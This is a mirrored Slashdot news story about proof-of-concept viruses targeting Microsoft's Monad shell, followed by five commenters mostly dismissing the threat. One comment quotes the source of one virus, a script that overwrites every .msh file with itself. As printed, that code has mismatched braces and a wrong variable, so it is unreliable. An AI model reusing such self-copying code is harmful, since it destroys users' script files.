Slashdot Mirror

← Back to Stories (view on slashdot.org)

Windows Vista Tool Targeted By Virus Writers

Posted by CowboyNeal on from the infectious-diseases dept.

An anonymous reader writes "Five proof-of-concept viruses that target Monad, the next version of Vista's command prompt, have been published on the web. Monad is a command line interface and scripting language that is similar to Unix shells such as bash, but is based on object-oriented programming and the .Net framework. The viruses' only action is to infect other shell scripts on the host's operating system. They would cause little harm in the wild, but would be relatively easy to modify using the information from the article, said Mikko Hyppönen, the director of antivirus research at F-Secure."

5 of 293 comments (clear)

  1. Re:Short on Details by Leeji · · Score: 5, Informative

    You got it right when you said "it might as well be a batch script." These are just Monad scripts running on the system, just like batch files, perl scripts, Cygwin bash scripts, Ruby scripts, etc.

    There is nothing intrinsic in Monad that enables these attacks, aside from it being a new language. In fact, Monad implements several features that help mitigate the dangers of traditional script viruses, as I outline here.

    --
    It all goes downhill from first post ...
  2. Re:Comments from a Monad developer by Osty · · Score: 4, Informative

    The real question is why the heck they decided to call it "Monad"?!

    The short answer: It's a codename. It won't ship with that name. Most likely it'll go with the less interesting "Microsoft Shell" or "msh".

    The long answer: Monad and Monads in functional programming (long answer has been diverted to Wikipedia, because I'm lazy).

    The non-answer: Get your mind of the gutter, you pervert. Not everything ending in "-nad" refers to genitalia.

  3. Re:Short on Details by Owndapan · · Score: 4, Informative
    I believe Monad/MSH is no longer even a part of the Longhorn release, so it is a bit unfair have everyone jump on it as a Windows Vista exploit. From Wikipedia:
    MSH was originally slated to be shipped with Windows Vista, but has since assumed its own release schedule. Microsoft sources have confirmed MSH's first public release will most likely precede the release of Vista and be part of the next edition of Microsoft Exchange, due in the second half of 2006.
  4. An Example of One of the So-Called Viruses by AdamBa · · Score: 4, Informative
    This is the verbatim text of one of the five viruses:

    $name_array=get-childitem *.msh
    foreach ($name in $name_array)
    {
    if ($name.Length -eq 249)
    $my_file=$name.Name
    }
    }

    foreach ($victim in $name_array)
    {
    if ($name.Length -ne 249)
    {
    copy-item $my_file $name.Name
    }
    }

    All it does is find every .msh file and replace its contents with itself. That's it. You could do it with a .CMD file in any version of Windows (and of course in any other scripting language).

    The other scripts get a bit more complicated (insert at a random spot in the file, etc) but that's basically it. There's no new vulnerability exposed by Monad.

    - adam

  5. i dont see why this is news.... by Madd+Scientist · · Score: 4, Informative
    1) it's a scripting language
    2) assume you already have command line access

    a "virus" at this point is trivial... just append the code to append itself at the end of every file it assumes is a script for this command line.

    this is like batch file viruses that format the drive... it isn't anything special, it's just a matter of getting the mark to run the file. nothing to see here.